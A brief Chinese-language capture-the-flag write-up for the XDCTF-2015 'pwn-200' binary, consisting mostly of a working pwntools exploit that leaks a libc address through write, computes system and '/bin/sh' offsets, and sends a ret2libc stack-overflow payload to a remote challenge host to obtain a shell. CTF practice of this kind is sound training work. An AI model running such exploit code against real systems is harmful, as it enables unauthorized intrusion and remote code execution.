pwn-200

题目来源： XDCTF-2015

 

栈溢出，无canary，无PIE

dynelf不知道怎么回事查不了system函数，那就泄露地址直接查libc-database

exp如下：

from pwn import *

#io = process('./pwn-200')
io = remote('111.200.241.244', 59980)

#context.log_level = 'debug'

main_addr = 0x80484BE
write_plt = 0x80483C0
read_plt = 0x8048390
goal_addr = 0x804a100
write_got = 0x804A010

def leak(address):
    payload = b'a' * 112 + p32(write_plt) + p32(main_addr)
    payload += p32(1) + p32(address) + p32(4)
    io.recvuntil('Welcome to XDCTF2015~!\n')
    io.send(payload)
    addr = io.recv(4)
    return addr

#d = DynELF(leak, elf = ELF('./pwn-200'))
#system_addr = d.lookup('system', 'libc')
write_addr = u32(leak(write_got))
info('write_addr: ' + hex(write_addr))
libc_base = write_addr - 0xd43c0
info('libc_base: ' + hex(libc_base))
system_addr = libc_base + 0x3a940
info('system_addr: ' + hex(system_addr))
binsh_addr = libc_base + 0x15902b
info('binsh_addr: ' + hex(binsh_addr))

payload = b'a' * 112 + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.recvuntil('Welcome to XDCTF2015~!\n')
io.send(payload)

io.interactive()